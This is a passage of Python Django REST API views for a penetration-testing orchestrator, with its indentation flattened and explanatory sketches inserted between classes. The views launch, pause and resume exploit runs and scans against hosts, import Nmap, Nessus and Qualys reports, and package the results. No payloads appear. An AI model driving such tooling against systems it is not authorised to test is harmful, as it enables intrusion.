scan_id=obj.exploits_pause(scan_attributes.data["project_id"],concurrent)
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["response_code"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ResumeScan(APIView):
"""
Objective :
The objective of this class is to serve the POST method, which takes the scan/project id
and invokes the appropriate backend file Gui_main_driver.py to resume the scan.
In order to understand the input given to this method and the response returned, read the API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
scan_attributes=General(data=request.data)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
scan_id=obj.main_resume(scan_attributes.data["project_id"],'','')
if scan_id != -1:
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(scan_id,'processing')
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["errors"]="Some exception occurred, can't resume project"
return_response["value"]="Some exception occurred, can't resume project"
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
class ResumeExploits(APIView):
"""
Objective :
The objective of this class is to serve the POST method, which takes the scan/project id
and invokes the appropriate backend file Gui_main_driver.py to resume the vulnerability scan.
In order to understand the input given to this method and the response returned, read the API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
try:
scan_attributes=General(data=request.data)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
exploit_status=obj.exploits_resume(scan_attributes.data["project_id"])
if exploit_status["status"]=="success":
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(scan_attributes.data["project_id"],'processing',True)
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_attributes.data["project_id"])
return_response["value"]=str(scan_attributes.data["project_id"])
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ProjectStatus(APIView):
def get(self,request,format=None):
try:
obj=IPtable.Projects()
to_validate=General(data=request.data)
if to_validate.is_valid():
data=obj.fetch_project_status(to_validate.data["project_id"])
return Response(JSONRenderer().render(data))
except Exception as ee:
resp_text={}
resp_text["status"]="failure"
resp_text["value"]=str(ee)
return Response(JSONRenderer().render(resp_text))
class ExploitableProjects(APIView):
"""
Objective :
The objective of this class is to serve the GET method, which returns the project ids of the
projects for which discovery is over and which are eligible for a vulnerability scan.
In order to understand the input given to this method and the response returned, read the API documentation.
"""
def get(self,request,format=None):
try:
paused=request.data["paused"]
obj=IPtable.Projects()
if paused==True:
projects=obj.completed_projects(None,True)
else:
projects=obj.completed_projects()
project_list=[]
for project in projects:
#print str(project[0])+ " " +str(project[1])
project_dict={}
project_dict["id"]=project[0]
project_dict["name"]=project[1]
project_dict["project_status"]=project[2]
project_dict["project_status_exploits"]=project[3]
project_dict["mode"]=project[4]
#,mode,Date,IPrange,Port_range,switch
project_dict["Date"]=str(project[5]).split()[0]
project_dict["Time"]=str(project[5]).split()[1]
project_dict["IPrange"]=project[6]
project_dict["port_range"]=project[7]
project_dict["switch"]=project[8]
project_list.append(project_dict)
#print "\n\n\n My val is --->"+str(project_list)
return_response={}
if 1:#serialize.is_valid():
return_response["status"]="success"
#return_response["data"]=serialize.data
return_response["data"]=project_list
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ExploitConfig_overwrite(APIView):
"""
Objective :
The objective of this class is to serve the POST method, which takes the updated configuration
for a project, deletes the old configuration and results, and restores the default
configuration, invoking the method updateDefaultconfiguration() in Gui_main_driver.py.
In order to understand the input given to this method and the response returned, read the API documentation.
"""
def configure_response(self,default_config):
config_list=[]
config_dict={}
return_val=[]
for config in default_config["value"]:
config_dict={}
#print str(project[0])+ " " +str(project[1])
config_dict["id"]=config[0]
config_dict["project_id"]=config[1]
config_dict["host"]=config[2]
config_dict["port"]=config[3]
config_dict["service"]=config[4]
config_dict["project_status"]=config[5]
config_dict["Commands"]=config[6]
config_dict["reconfig_service"]=False
config_dict["reconfig_exploit"]=False
if len(config)> 7:
config_dict["service_type"]=config[7]
if len(config)>8:
config_dict["state"]=config[8]
config_dict["version"]=config[9]
if len(config) >9:
config_dict["test_case"]=config[10]
config_list.append(config_dict)
return_val.append(config_dict)
return_val.append(config_list)
return return_val
def post(self,request,format=None):
obj=Gui_main_driver.Gui_main()
project_id=request.data["project_id"]
continue_=False
delete=True
default_config=obj.Overwrite_and_GetDefaultConfiguration(project_id,'','',continue_,delete,False)
if default_config["status"]=="reconfig":
resp=self.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
#print "\n\n\n"+str(project_list)
return_response={}
if 1:#serialize.is_valid():
return_response["status"]="success"
#return_response["data"]=serialize.data #Note Both work the same !!!
return_response["data"]=config_list #the query list can be rendered to JSON directly; no need to build a serializer wrapper
else:
return_response["status"]="failure"
return_response["errors"]=serialize.errors
return_response["value"]=serialize.errors
return Response(JSONRenderer().render(return_response))
else:
return Response(JSONRenderer().render(default_config))
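The tuple-to-dict mapping inside configure_response above can be expressed as a standalone function. A sketch (the name `row_to_config` is hypothetical) with length guards chosen so every index accessed is actually covered by the row:

```python
def row_to_config(config):
    # Map one database row (a tuple) to the dict shape produced by
    # configure_response; trailing columns are optional, so they are
    # only copied when the row is long enough to contain them.
    keys = ["id", "project_id", "host", "port", "service",
            "project_status", "Commands"]
    config_dict = dict(zip(keys, config))
    config_dict["reconfig_service"] = False
    config_dict["reconfig_exploit"] = False
    if len(config) > 7:
        config_dict["service_type"] = config[7]
    if len(config) > 9:
        config_dict["state"] = config[8]
        config_dict["version"] = config[9]
    if len(config) > 10:
        config_dict["test_case"] = config[10]
    return config_dict
```

Note the original checks (`len(config)>8` before reading `config[9]`, `len(config)>9` before reading `config[10]`) would raise IndexError on rows of exactly that length; the bounds above avoid that.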
class AddTestCase(APIView):
def post(self,request,format=None):
return_response={}
all_values=[]
obj=Gui_main_driver.Gui_main()
try:
project_id=request.data["project_id"]
data_=Configuration(data=request.data["data"],many=True)
concurrent=request.data["concurrent"]
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]="Error message is -->"+str(ee)
return Response(JSONRenderer().render(return_response))
try:
if data_.is_valid(): #list of dictionaries with each dictionary contains list of dict
continue_=False
delete=False
if concurrent =="0":
update_result=obj.InsertDefaultconfiguration(data_.data,project_id)
elif concurrent=="1":
update_result=obj.InsertDefaultconfiguration(data_.data,project_id,'','',True)
#print "The length of elements returned :"+str(len(update_result))
#print "\n\nObtained result is :" +str(update_result)
return_response["status"]="success"
return_response["value"]=update_result[0] #the update status of the services
return_response["data"]=update_result[1] #the list of updated services
else:
return_response["status"]="failure"
return_response["value"]="Error message is :"+str(data_.errors)
return_response["errors"]=data_.errors
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]="Error message is :"+str(ee)
return Response(JSONRenderer().render(return_response))
return Response(JSONRenderer().render(return_response))
class ExploitConfig(APIView):
"""
Objective :
The objective of this class is to serve the POST method, which takes the updated configuration
for a project and updates the configuration, invoking the method updateDefaultconfiguration()
in Gui_main_driver.py. Finally it returns the updated configuration.
In order to understand the input given to this method and the response returned, read the API documentation.
"""
def post(self,request,format=None):
return_response={}
all_values=[]
obj=Gui_main_driver.Gui_main()
try:
concurrent=request.data["concurrent"]
project_id=request.data["project_id"]
data_=Configuration(data=request.data["data"],many=True) #transforms the underlying dictionary into an OrderedDict (a collection of tuples), recursively
#data_=test_multi(data=request.data["data"],many=True)
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]="Error message is -->"+str(ee)
return Response(JSONRenderer().render(return_response))
try:
if data_.is_valid(): #list of dictionaries with each dictionary contains list of dict
continue_=False
delete=False
if concurrent =="0":
update_result=obj.updateDefaultconfiguration(data_.data,project_id)
elif concurrent=="1":
update_result=obj.updateDefaultconfiguration(data_.data,project_id,'','',True)
#print "\n\nObtained result is :" +str(update_result)
return_response["status"]="success"
return_response["value"]=update_result[0] #the update status of the services
return_response["data"]=update_result[1] #the list of updated services
else:
return_response["status"]="failure"
return_response["value"]="Error message is :"+str(data_.errors)
return_response["errors"]=data_.errors
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]="Error message is :"+str(ee)
return Response(JSONRenderer().render(return_response))
return Response(JSONRenderer().render(return_response))
def configure_response(self,default_config):
config_list=[]
config_dict={}
return_val=[]
for config in default_config["value"]:
#print str(config)
config_dict={}
#print str(project[0])+ " " +str(project[1])
config_dict["id"]=config[0]
config_dict["project_id"]=config[1]
config_dict["host"]=config[2]
config_dict["port"]=config[3]
config_dict["service"]=config[4]
config_dict["project_status"]=config[5]
config_dict["Commands"]=config[6]
config_dict["reconfig_service"]=False
config_dict["reconfig_exploit"]=False
if len(config)> 7:
config_dict["service_type"]=config[7]
if len(config)>9:
config_dict["state"]=config[8]
config_dict["version"]=config[9]
if len(config)>10:
config_dict["test_case"]=config[10]
config_list.append(config_dict)
return_val.append(config_dict)
return_val.append(config_list)
return return_val
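configure_response above maps each raw database row (a positional tuple) onto a dict keyed by column name, with length guards for the optional trailing columns. A self-contained sketch of that mapping with an invented sample row; note the guards here check the highest index actually read:

```python
FIELDS = ["id", "project_id", "host", "port", "service",
          "project_status", "Commands"]

def row_to_config(row):
    # Map the first seven positional columns to named keys.
    config = dict(zip(FIELDS, row))
    config["reconfig_service"] = False
    config["reconfig_exploit"] = False
    # Optional trailing columns: guard on the highest index accessed.
    if len(row) > 7:
        config["service_type"] = row[7]
    if len(row) > 9:
        config["state"] = row[8]
        config["version"] = row[9]
    if len(row) > 10:
        config["test_case"] = row[10]
    return config

sample = (1, 42, "10.0.0.5", 80, "http", "processing", "nmap -sV")
config = row_to_config(sample)
full = row_to_config(sample + ("web", "open", "2.4", "TC-7"))
```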
def get(self,request,format=None):
obj=Gui_main_driver.Gui_main()
project_id=request.data["project_id"]
continue_=False
delete=False
default_config=obj.getDefaultConfiguration(project_id,continue_,delete,False)
if default_config["status"]=="reconfig":
resp=self.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
#print "\n\n\n"+str(project_list)
return_response={}
try:
print "Reached here in try"
#serialize=Configuration(data=config_dict)
#print "\n\n\nseturnrializers are :"+str(serialize)+"\n\n"
except Exception as ee:
print "Exception " +str(ee)
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
#serializer validation is disabled; the query list can be rendered to JSON directly
return_response["status"]="success"
return_response["data"]=config_list #while retrieving data we can simply send the query list back as JSON; no need to build a wrapper
return Response(JSONRenderer().render(return_response))
else:
return Response(JSONRenderer().render(default_config))
class LaunchExploits(APIView):
"""
Objective :
This class serves the POST method, which takes a project id as input and
starts vulnerability scanning for that project.
It invokes the Gui_main_driver.py file to start the vulnerability scan.
For details of the input expected by this method and the response returned, read the API documentation.
"""
def post(self,request,format=None):
try:
self.project_obj=IPtable.Projects()
obj=Gui_main_driver.Gui_main()
exploit_data=Exploits(data=request.data)
return_response={}
if(exploit_data.is_valid()):
project_id=exploit_data.data["project_id"]
continue_=True
delete=False
get_default_config=False
threading=exploit_data.data["threading"]
result=self.project_obj.completed_projects(int(project_id))
if result[0] > 0:
exploit_status=obj.LaunchExploits(project_id,continue_,delete,get_default_config,threading)
if exploit_status["status"]=="success":
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(project_id,'processing',True)
return_response["status"]=exploit_status["status"]
return_response["value"]=exploit_status["value"]
else:
return_response["status"]="failure"
return_response["value"]="Invalid project id."
else:
return_response["status"]="failure"
return_response["errors"]=exploit_data.errors
return_response["value"]=exploit_data.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class LaunchExploitsConcurrent(APIView):
"""
Objective :
This class serves the POST method, which takes a project id as input and
starts vulnerability scanning for that project.
It invokes the Gui_main_driver.py file to start vulnerability scanning in concurrent mode.
For details of the input expected by this method and the response returned, read the API documentation.
"""
def post(self,request,format=None):
try:
obj=Gui_main_driver.Gui_main()
exploit_data=ExploitsConcurrent(data=request.data)
return_response={}
if(exploit_data.is_valid()):
project_id=exploit_data.data["project_id"]
continue_=True
delete=False
get_default_config=False
threading=exploit_data.data["threading"]
if threading==True:
threading=False
rec_list=exploit_data.data["record_list"]
exploit_status=obj.LaunchExploits(project_id,continue_,delete,get_default_config,False,True,rec_list)
return_response["status"]=exploit_status["status"]
return_response["value"]=exploit_status["value"]
else:
return_response["status"]="failure"
return_response["errors"]=exploit_data.errors
return_response["value"]=exploit_data.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class DownloadAllMannual(APIView):
"""
Objective :
This class serves the POST method, which takes a project id as input and
returns a zipped folder containing all the reports, pcap files, etc.
For details of the input expected by this method and the response returned, read the API documentation.
"""
def __init__(self):
self.folder_dir=os.path.dirname(os.path.realpath(__file__))
self.results_path=os.path.join(self.folder_dir,"Results")
self.folder_name=os.path.join(self.results_path,"Data_")
self.All_Json=os.path.join(self.folder_dir,"all_commands.json")
self.Master_Json=os.path.join(self.folder_dir,"Master.json")
self.Mandatory_Json=os.path.join(self.folder_dir,"Mandatory.json")
self.Analytical_Json=os.path.join(self.folder_dir,"Analytical.json")
def zipdir(self,path,ziph):
for dirname,subdirs,files in os.walk(path):
abs_path_dir=dirname
rel_path_dir=abs_path_dir[len(path)+len(os.sep):]
for file_ in files:
abs_path=os.path.join(dirname,file_)
rel_path=abs_path[len(path)+len(os.sep):]
ziph.write(abs_path,rel_path)
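zipdir above walks a directory tree and stores every file under its path relative to the archive root, so the zip does not embed the absolute directory prefix. A self-contained sketch of the same walk (directory contents are invented; `os.path.relpath` replaces the manual `len(path)+len(os.sep)` slicing):

```python
import os
import tempfile
import zipfile

def zip_directory(path, zip_path):
    # Archive every file under `path`, storing paths relative to it.
    with zipfile.ZipFile(zip_path, "w", zipfile.ZIP_DEFLATED) as ziph:
        for dirname, _subdirs, files in os.walk(path):
            for file_ in files:
                abs_path = os.path.join(dirname, file_)
                rel_path = os.path.relpath(abs_path, path)
                ziph.write(abs_path, rel_path)

root = tempfile.mkdtemp()
os.makedirs(os.path.join(root, "reports"))
with open(os.path.join(root, "reports", "scan.txt"), "w") as fh:
    fh.write("demo")
zip_path = os.path.join(root, "out.zip")
zip_directory(os.path.join(root, "reports"), zip_path)
with zipfile.ZipFile(zip_path) as z:
    names = z.namelist()
```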
def init_project_directory(self,project_id):
#print "Initialising parent directory "
try:
if not os.path.exists(self.folder_name+str(project_id)):
return -1
return 1
except Exception as ee:
#self.print_Error("Error while creating directory !!"+str(ee))
print "Exception: "+str(ee)
return -1
def post(self,request,format=None):
self.project_obj=IPtable.Projects()
try:
return_response={}
to_validate=General(data=request.data)
if to_validate.is_valid():
project_id=to_validate.data["project_id"]
result=self.project_obj.completed_projects(int(project_id))
print "Result is : " +str(result)
if result[0] > 0:
status=self.init_project_directory(project_id)
print "status is : "+str(status)
if status != -1:
my_obj=IPexploits.IPexploits()
my_obj.data_path=self.folder_name+str(project_id)
my_obj.generate_report(project_id)
self.data_path=self.folder_name+str(project_id)
zip_folder_name="Data_"+str(project_id)+".zip"
zip_folder_creation_path=os.path.join(self.results_path,zip_folder_name)
zip_folder_path=self.data_path #file to be zipped
zipf=zipfile.ZipFile(zip_folder_creation_path,'w',zipfile.ZIP_DEFLATED)
self.zipdir(zip_folder_path,zipf)
zipf.close()
zip_file=open(zip_folder_creation_path,'rb')
resp=HttpResponse(FileWrapper(zip_file),content_type="application/zip")
resp['Content-Disposition']='attachment;filename="%s"'%zip_folder_name
return resp
else:
return_response["status"]="failure"
return_response["value"]="No data is present for the given project id."
else:
return_response["status"]="failure"
return_response["value"]="Invalid project id."
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
print "Exception! "+str(ee)
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class MergeReports(APIView):
"""
Objective :
This class serves the POST method, which takes a project id as input and
returns a zipped folder containing the merged Qualys, Nessus and manual vulnerability scanning reports.
For details of the input expected by this method and the response returned, read the API documentation.
"""
def post(self,request,format=None):
obj=Report_orchestration.Report_merger(True,True)
self.project_obj=IPtable.Projects()
try:
return_response={}
to_validate=Merge_reports(data=request.data)
if to_validate.is_valid():
project_id=to_validate.data["project_id"]
format_=to_validate.data["report_format"]
#obj=Report_merger(True,True)
result=self.project_obj.completed_projects(int(project_id))
if result[0] > 0:
resp=obj.generate_report(int(project_id),format_)
if resp["status"]=="success":
return_response["status"]="success"
return_response["value"]=resp["value"]
zip_file=open(resp["value"],'rb')
resp=HttpResponse(FileWrapper(zip_file),content_type="application/zip")
resp['Content-Disposition']='attachment;filename="%s"'%'result.zip'
return resp
else:
return_response["status"]="failure"
return_response["value"]=resp["value"]
else:
return_response["status"]="failure"
return_response["value"]="Invalid project id."
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class UploadQualysXml(APIView):
"""
Objective :
This class serves the POST method, which takes a Qualys XML report as input,
parses it and stores the results in a database table.
For details of the input expected by this method and the response returned, read the API documentation.
"""
parser_classes=(MultiPartParser,)
def post(self,request,format=None):
try:
to_validate=UploadXml(data=request.data)
return_response={}
if to_validate.is_valid():
file_obj=request.FILES['filename']
F_validator=FileValidator.FileValidator()
is_xml=F_validator.validateXML(file_obj)
if is_xml:
#print "Validation results are :-->" +str(is_xml)
folder_dir=os.path.dirname(os.path.realpath(__file__))
results_path=os.path.join(folder_dir,"XML_reports")
un_id=uuid.uuid1()
pid=to_validate.data["project_name"]
xml_file_name=str(file_obj.name)+"_pid:"+str(pid)+"_uid:"+str(un_id)+".xml"
xml_file_path=os.path.join(results_path,xml_file_name)
with open(xml_file_path,'wb') as out_file:
for chunk in file_obj.chunks():
out_file.write(chunk)
qualys=Qualys_parser.QualysParser()
qualys_results=None
val=qualys.parse(xml_file_path,int(pid))
if val["status"]=="success":
return_response["status"]="success"
return_response["value"]=str(pid)
else:
return_response["status"]="failure"
return_response["value"]=str(val["value"])
os.remove(xml_file_path)
else:
return_response["status"]="failure"
return_response["value"]="Supplied file was not XML; only XML files are accepted."
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
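The upload handlers above stream the posted file to disk chunk by chunk and tag the saved name with the project id and a uuid so concurrent uploads cannot collide. A standalone sketch of that flow; `FakeUpload` is an invented stand-in for Django's `UploadedFile`, which exposes the same `chunks()` iterator:

```python
import os
import tempfile
import uuid

class FakeUpload(object):
    # Minimal stand-in for Django's UploadedFile: a name plus
    # a chunks() iterator yielding byte blocks.
    def __init__(self, name, payload, chunk_size=4):
        self.name = name
        self._payload = payload
        self._chunk_size = chunk_size

    def chunks(self):
        for i in range(0, len(self._payload), self._chunk_size):
            yield self._payload[i:i + self._chunk_size]

def save_upload(file_obj, results_path, pid):
    un_id = uuid.uuid1()
    # Same naming scheme as the handler: original name + project id + uuid.
    name = "%s_pid:%s_uid:%s.xml" % (file_obj.name, pid, un_id)
    path = os.path.join(results_path, name)
    with open(path, "wb") as out_file:
        for chunk in file_obj.chunks():
            out_file.write(chunk)
    return path

results_path = tempfile.mkdtemp()
saved = save_upload(FakeUpload("report.xml", b"<scan/>"), results_path, 7)
with open(saved, "rb") as fh:
    data = fh.read()
```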
class ReportOnFly(APIView):
"""
Objective :
This class serves the POST method, which takes either a Qualys or a Nessus
report as input (one at a time), parses the report, maps CVEs to exploits and
returns a final copy of the integrated report in the format chosen by the user.
For details of the input expected by this method and the response returned, read the API documentation.
"""
parser_classes=(MultiPartParser,)
def post(self,request,format=None):
try:
to_validate=OnFly(data=request.data)
return_response={}
if to_validate.is_valid():
file_obj=request.FILES['filename']
F_validator=FileValidator.FileValidator()
is_xml=F_validator.validateXML(file_obj)
if is_xml:
valid=["nessus","qualys"]
if (to_validate.data["source"] not in valid):
return_response["status"]="failure"
return_response["value"]="The source of the report must be either qualys or nessus"
return Response(JSONRenderer().render(return_response))
folder_dir=os.path.dirname(os.path.realpath(__file__))
results_path=os.path.join(folder_dir,"XML_reports")
un_id=uuid.uuid1()
xml_file_name=str(file_obj.name)+"_uid:"+str(un_id)+".xml"
xml_file_path=os.path.join(results_path,xml_file_name)
with open(xml_file_path,'wb') as out_file:
for chunk in file_obj.chunks():
out_file.write(chunk)
if to_validate.data["source"]=="nessus":
obj=Exploit_mapping.Exploit_mapping(xml_file_path)
else:
obj=Exploit_mapping.Exploit_mapping('',xml_file_path)
val=obj.generate_report(to_validate.data["report_format"])
os.remove(xml_file_path)
if val["status"]=="success":
return_response["status"]="success"
return_response["value"]=val["value"]
zip_file=open(val["value"],'rb')
resp=HttpResponse(FileWrapper(zip_file),content_type="application/zip")
resp['Content-Disposition']='attachment;filename="%s"'%'Report.zip'
return resp
else:
return_response["status"]="failure"
return_response["value"]=str(val["value"])
else:
return_response["status"]="failure"
return_response["value"]="Supplied file was not XML; only XML files are accepted."
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
print "Inside exception: "+str(ee)
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class UploadNessusXml(APIView):
"""
Objective :
This class serves the POST method, which takes a Nessus XML report as input,
parses it and stores the results in a database table.
For details of the input expected by this method and the response returned, read the API documentation.
"""
parser_classes=(MultiPartParser,)
def post(self,request,format=None):
try:
to_validate=UploadXml(data=request.data)
return_response={}
if to_validate.is_valid():
file_obj=request.FILES['filename']
F_validator=FileValidator.FileValidator()
is_xml=F_validator.validateXML(file_obj)
if is_xml:
#print "Validation results are :-->" +str(is_xml)
folder_dir=os.path.dirname(os.path.realpath(__file__))
results_path=os.path.join(folder_dir,"XML_reports")
un_id=uuid.uuid1()
pid=to_validate.data["project_name"]
xml_file_name=str(file_obj.name)+"_pid:"+str(pid)+"_uid:"+str(un_id)+".nessus"
xml_file_path=os.path.join(results_path,xml_file_name)
with open(xml_file_path,'wb') as out_file:
for chunk in file_obj.chunks():
out_file.write(chunk)
nessus=Nessus_parser.Nessus_Parser()
nessus_results=None
val=nessus.parse(xml_file_path,int(pid))
if val["status"]=="success":
return_response["status"]="success"
return_response["value"]=str(pid)
else:
return_response["status"]="failure"
return_response["value"]=str(val["value"])
os.remove(xml_file_path)
else:
return_response["status"]="failure"
return_response["value"]="Supplied file was not XML; only XML files are accepted."
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class UploadNmapXml(APIView):
"""
Objective :
This class serves the POST method, which takes an Nmap XML report as input,
parses it and stores the results in a database table.
For details of the input expected by this method and the response returned, read the API documentation.
"""
parser_classes=(MultiPartParser,)
def post(self,request,format=None):
try:
IPtable_obj=IPtable.IPtable()
to_validate=UploadXmlNmap(data=request.data)
return_response={}
if to_validate.is_valid():
file_obj=request.FILES['filename']
F_validator=FileValidator.FileValidator()
is_xml=F_validator.validateXML(file_obj)
if is_xml:
folder_dir=os.path.dirname(os.path.realpath(__file__))
results_path=os.path.join(folder_dir,"XML_reports")
pid=IPtable_obj.Insert(to_validate.data["project_name"],'import',str(file_obj.name))
if (pid==-1):
return_response["status"]="failure"
return_response["value"]="Some error occurred while inserting details"
return Response(JSONRenderer().render(return_response))
IPtable_obj.update_mapping(to_validate.data["app_id"],int(pid),to_validate.data["assessment_id"])
xml_file_name=str(file_obj.name)+"_"+str(pid)
xml_file_path=os.path.join(results_path,xml_file_name)
with open(xml_file_path,'wb') as out_file:
for chunk in file_obj.chunks():
out_file.write(chunk)
val=nmap_parser.Import('gui',xml_file_path,to_validate.data["project_name"],pid)
if val["status"]=="success":
return_response["status"]="success"
return_response["value"]=str(pid)
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(pid,'complete')
else:
return_response["status"]="failure"
return_response["value"]=str(val["value"])
else:
return_response["status"]="failure"
return_response["value"]="Supplied file was not XML; only XML files are accepted."
else:
return_response["status"]="failure"
return_response["value"]=to_validate.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class Reconfigure():
"""
Objective :
This class helps with reconfiguration of the input given by the user for
updating the configuration. It does not interact with the web service directly.
For details of the input expected by this method and the response returned, read the API
documentation.
"""
def configure_response(self,default_config):
config_list=[]
config_dict={}
record_list=[]
return_val=[]
for config in default_config["value"]:
#print str(config)
config_dict={}
#print str(project[0])+ " " +str(project[1])
config_dict["id"]=config[0]
record_list.append(config[0])
config_dict["project_id"]=config[1]
config_dict["host"]=config[2]
config_dict["port"]=config[3]
config_dict["service"]=config[4]
config_dict["project_status"]=config[5]
config_dict["Commands"]=config[6]
config_dict["reconfig_service"]=False
config_dict["reconfig_exploit"]=False
if len(config)> 7:
config_dict["service_type"]=config[7]
if len(config)>9:
config_dict["state"]=config[8]
config_dict["version"]=config[9]
if len(config)>10:
config_dict["test_case"]=config[10]
config_list.append(config_dict)
return_val.append(config_dict)
return_val.append(config_list)
return_val.append(record_list)
return return_val
class PollingConfig(APIView):
"""
Objective :
This class serves the GET and POST methods, which take the project id and
return the vulnerability-scanning configuration for the records whose discovery is over.
It is essentially used in concurrent mode.
For details of the input expected by this method and the response returned, read the API documentation.
"""
def get(self,request,format=None):
try:
return_response={}
project_id=request.data["project_id"]
obj=Polling.PollingExploits(int(project_id))
continue_=False
delete=False
default_config=obj.getConfiguration() #Get config of all records with pid
if default_config["status"]=="reconfig":
exp_obj=Reconfigure()
resp=exp_obj.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
record_list=resp[2]
return_response["status"]="success"
return_response["data"]=config_list
return_response["record_list"]=record_list
return Response(JSONRenderer().render(return_response))
else:
return Response(JSONRenderer().render(default_config))
except Exception as ee:
return_response["status"]="failure"
return_response["data"]=str(ee)
return Response(JSONRenderer().render(return_response))
def post(self,request,format=None):
try:
return_response={}
update_data=Polling_(data=request.data)
if(update_data.is_valid()):
project_id=update_data.data["project_id"]
record_list=update_data.data["record_list"]
obj=Polling.PollingExploits(int(project_id))
return_response=obj.UpdateStatus(record_list)
else:
return_response["status"]="failure"
return_response["errors"]=update_data.errors
return_response["value"]=update_data.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class PercentPolling(APIView):
"""
Objective :
This class serves the GET and POST methods, which return the percentage of
completion for discovery and vulnerability scanning.
For details of the input expected by this method and the response returned, read the API documentation.
"""
def get(self,request,format=None):
try:
self.project_obj=IPtable.Projects()
return_response={}
poll_data=Poll_me(data=request.data)
if poll_data.is_valid():
project_id=request.data["project_id"]
#result=self.project_obj.completed_projects(int(project_id))
if 1:#result[0] > 0:
obj=IPtable.Projects()
continue_=False
delete=False
valid_source=["discovery","scan"]
if request.data["source"] not in valid_source:
return_response["status"]="failure"
return_response["data"]="The source can either be scan or discovery"
return_response["value"]="The source can either be scan or discovery"
return Response(JSONRenderer().render(return_response))
poll_results=obj.Poll(int(project_id),request.data["source"])
if poll_results != -1:
return_response["status"]="success"
return_response["data"]=poll_results[0]
return_response["value"]=poll_results[0]
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["value"]="Can't fetch polling status. Kindly check the supplied params."
return_response["data"]="Can't fetch polling status. Kindly check the supplied params."
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["value"]="Invalid project id"
return_response["data"]="Invalid project id"
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["data"]=poll_data.errors
return_response["errors"]=poll_data.errors
return_response["value"]=poll_data.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["data"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ScannningStUp(APIView):
def post(self,request,format=None):
try:
return_response={}
update_data=General(data=request.data)
try:
concurrent=request.data["concurrent"] if request.data["concurrent"] is not None else -1
except:
concurrent=-1
print "In except and conc is :"+str(concurrent)
if(update_data.is_valid()):
project_id=update_data.data["project_id"]
#record_list=update_data.data["record_list"]
obj=Polling.PollingExploits(int(project_id))
if concurrent ==-1:
return_response=obj.UpdateStatusExploit('',True)
else:
